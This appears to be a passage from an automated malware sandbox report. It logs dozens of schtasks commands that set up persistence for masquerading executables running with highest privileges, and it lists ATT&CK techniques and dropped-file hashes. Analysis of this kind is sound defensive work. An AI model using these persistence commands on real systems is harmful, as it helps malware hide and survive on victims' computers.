C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "COMC" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\COM.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "COM" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\COM.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "COMC" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\COM.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\microsoft shared\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\Network Sharing\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\Network Sharing\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\odt\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Drops file in Windows directory
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:620

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:4716

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:312

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0cdc54dc-49ba-46a4-b48e-2692de9e971e.vbs

Filesize
481B

MD5
bc1b4988c65b51bee397ee3e08ed725b

SHA1
3a0218f175828b0195d5adb8c3a306939460f953

SHA256
3708421c57555de82068475fc2652ee3a45e4414b4e764f7b3f146313d742e15

SHA512
7862b86ebe85518d39935f18eae432db55090580581c911572b1fd8e90011250f2b8a18ad7809481c6821970813ffcdf9410abe9d621f3ff3495ab89ae3084e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\VsDlx_reg.exe

Filesize
392KB

MD5
631210f9a7095d5fd531b60bc0cbdb18

SHA1
6b5b8d9c42c9424606e09bc67cbf63bd16f28226

SHA256
eded810fab6e8e234bdcabedf6d9634d8cf5f06aa5dbf09f74d67ae4e5c922a3

SHA512
06e9eec8debcb09fa1e0582c8274c73ed923e0025ce45590a3653102a8ca45bd8314c988d4eb33d17fbcd799a3d4be107c01050cd58e6c7ceac93c7bea0bf808

Download Submit
C:\Users\Admin\AppData\Local\Temp\VsDlx_reg.exe

Filesize
392KB

MD5
631210f9a7095d5fd531b60bc0cbdb18

SHA1
6b5b8d9c42c9424606e09bc67cbf63bd16f28226

SHA256
eded810fab6e8e234bdcabedf6d9634d8cf5f06aa5dbf09f74d67ae4e5c922a3

SHA512
06e9eec8debcb09fa1e0582c8274c73ed923e0025ce45590a3653102a8ca45bd8314c988d4eb33d17fbcd799a3d4be107c01050cd58e6c7ceac93c7bea0bf808

Download Submit
C:\Users\Admin\AppData\Local\Temp\VsDlx_reg.exe

Filesize
392KB

MD5
631210f9a7095d5fd531b60bc0cbdb18

SHA1
6b5b8d9c42c9424606e09bc67cbf63bd16f28226

SHA256
eded810fab6e8e234bdcabedf6d9634d8cf5f06aa5dbf09f74d67ae4e5c922a3

SHA512
06e9eec8debcb09fa1e0582c8274c73ed923e0025ce45590a3653102a8ca45bd8314c988d4eb33d17fbcd799a3d4be107c01050cd58e6c7ceac93c7bea0bf808

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xkkwe2z.0rf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a8TbDE3pUR.bat

Filesize
194B

MD5
fd35ae32c71fdedb20891f57af5d2555

SHA1
4ee34a6e170bb53398cbeb08f04d3db0fc42abf8

SHA256
6e0bf0faad0c3ddd1d4ae86c84c54063bdc0eea7b9bcdb316fddb2be23ae3617

SHA512
972abeadd5b2b32fec1ee79071fe6fefff984d45b3d1fa25edd22bf2a6c1351b1a8e3c4203fe29a1212c1ae5c79275bb9feced504f378bb4032bf35e81792dfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ba95368b-d68c-4581-a606-76d03788f8b5.vbs

Filesize
704B

MD5
00fc3f8b4d7f95d911d84fd888a07681

SHA1
45adc1bf2fc2e221e61660d6640b08ee410a4c94

SHA256
f0c4619a652c29e364c76e25930006d2288ad91a3dc70583fce202dec6f8f1a7

SHA512
101b0f26bfa515939c198148a4077b142a7bb22d2944558343c71295d4e3f78ef0dd2b3790d0f344a488bff21e723bba7775bc43d56867514cf3a20f0adf26f8

Download Submit
C:\Windows\COM.exe

Filesize
298KB

MD5
deb21814dd77173ca8cd236092a66180

SHA1
7ba9529517ccde96f052d36035456809cc2fe0d9

SHA256
c42b2b656dc3acce25058dbdb73738477ab2589042192faddd26ed2acbf1ad55

SHA512
7eb34ba13822fed57c38d645afa7a4b950ef729439531cab7a2e02133891de21ade25b76088e56789fcdf9c0a14f9c0981b11ce8edb0ffa99a9e06278779bae6

Download Submit
C:\Windows\COM.exe

Filesize
298KB

MD5
deb21814dd77173ca8cd236092a66180

SHA1
7ba9529517ccde96f052d36035456809cc2fe0d9

SHA256
c42b2b656dc3acce25058dbdb73738477ab2589042192faddd26ed2acbf1ad55

SHA512
7eb34ba13822fed57c38d645afa7a4b950ef729439531cab7a2e02133891de21ade25b76088e56789fcdf9c0a14f9c0981b11ce8edb0ffa99a9e06278779bae6

Download Submit
C:\Windows\COM.exe

Filesize
298KB

MD5
deb21814dd77173ca8cd236092a66180

SHA1
7ba9529517ccde96f052d36035456809cc2fe0d9

SHA256
c42b2b656dc3acce25058dbdb73738477ab2589042192faddd26ed2acbf1ad55

SHA512
7eb34ba13822fed57c38d645afa7a4b950ef729439531cab7a2e02133891de21ade25b76088e56789fcdf9c0a14f9c0981b11ce8edb0ffa99a9e06278779bae6

Download Submit
C:\Windows\websaves.exe

Filesize
1.0MB

MD5
216ff3355052307dc38a906d38fc1311

SHA1
92435804b0d8e7c22c16aa042f9af51ba131963d

SHA256
0c7a3a263c37cfced26ad746a0e3847427996032cbc652e6ce109d342d59d52e

SHA512
2bfda30f278426717f9ed51fd1435d5fbc04b23d3b55d790a4bb3b066dd08210dc9687c003f46a79534b345300a6d81d10a045903d0a801fdafaa1bbf796eb50

Download Submit
C:\Windows\websaves.exe

Filesize
1.0MB

MD5
216ff3355052307dc38a906d38fc1311

SHA1
92435804b0d8e7c22c16aa042f9af51ba131963d

SHA256
0c7a3a263c37cfced26ad746a0e3847427996032cbc652e6ce109d342d59d52e

SHA512
2bfda30f278426717f9ed51fd1435d5fbc04b23d3b55d790a4bb3b066dd08210dc9687c003f46a79534b345300a6d81d10a045903d0a801fdafaa1bbf796eb50

Download Submit
C:\Windows\websaves.exe

Filesize
1.0MB

MD5
216ff3355052307dc38a906d38fc1311

SHA1
92435804b0d8e7c22c16aa042f9af51ba131963d

SHA256
0c7a3a263c37cfced26ad746a0e3847427996032cbc652e6ce109d342d59d52e

SHA512
2bfda30f278426717f9ed51fd1435d5fbc04b23d3b55d790a4bb3b066dd08210dc9687c003f46a79534b345300a6d81d10a045903d0a801fdafaa1bbf796eb50

Download Submit
C:\odt\backgroundTaskHost.exe

Filesize
1.0MB

MD5
216ff3355052307dc38a906d38fc1311

SHA1
92435804b0d8e7c22c16aa042f9af51ba131963d

SHA256
0c7a3a263c37cfced26ad746a0e3847427996032cbc652e6ce109d342d59d52e

SHA512
2bfda30f278426717f9ed51fd1435d5fbc04b23d3b55d790a4bb3b066dd08210dc9687c003f46a79534b345300a6d81d10a045903d0a801fdafaa1bbf796eb50

Download Submit
C:\odt\backgroundTaskHost.exe

Filesize
1.0MB

MD5
216ff3355052307dc38a906d38fc1311

SHA1
92435804b0d8e7c22c16aa042f9af51ba131963d

SHA256
0c7a3a263c37cfced26ad746a0e3847427996032cbc652e6ce109d342d59d52e

SHA512
2bfda30f278426717f9ed51fd1435d5fbc04b23d3b55d790a4bb3b066dd08210dc9687c003f46a79534b345300a6d81d10a045903d0a801fdafaa1bbf796eb50

Download Submit
memory/536-293-0x000000001B160000-0x000000001B170000-memory.dmp

Filesize
64KB

Download
memory/536-280-0x000000001B160000-0x000000001B170000-memory.dmp

Filesize
64KB

Download
memory/1800-176-0x00000191399F0000-0x0000019139A00000-memory.dmp

Filesize
64KB

Download
memory/1800-181-0x0000019139900000-0x0000019139922000-memory.dmp

Filesize
136KB

Download
memory/1800-175-0x00000191399F0000-0x0000019139A00000-memory.dmp

Filesize
64KB

Download
memory/1848-158-0x00000274F47F0000-0x00000274F485C000-memory.dmp

Filesize
432KB

Download
memory/2008-133-0x0000000000EF0000-0x00000000010B0000-memory.dmp

Filesize
1.8MB

Download
memory/2932-218-0x000002C235BC0000-0x000002C235BD0000-memory.dmp

Filesize
64KB

Download
memory/2932-172-0x000002C21B4F0000-0x000002C21B544000-memory.dmp

Filesize
336KB

Download
memory/4524-209-0x000000001AD40000-0x000000001AD90000-memory.dmp

Filesize
320KB

Download
memory/4524-265-0x000000001AD90000-0x000000001ADA0000-memory.dmp

Filesize
64KB

Download
memory/4524-177-0x000000001AD90000-0x000000001ADA0000-memory.dmp

Filesize
64KB

Download
memory/4524-153-0x0000000000100000-0x000000000020A000-memory.dmp

Filesize
1.0MB

Download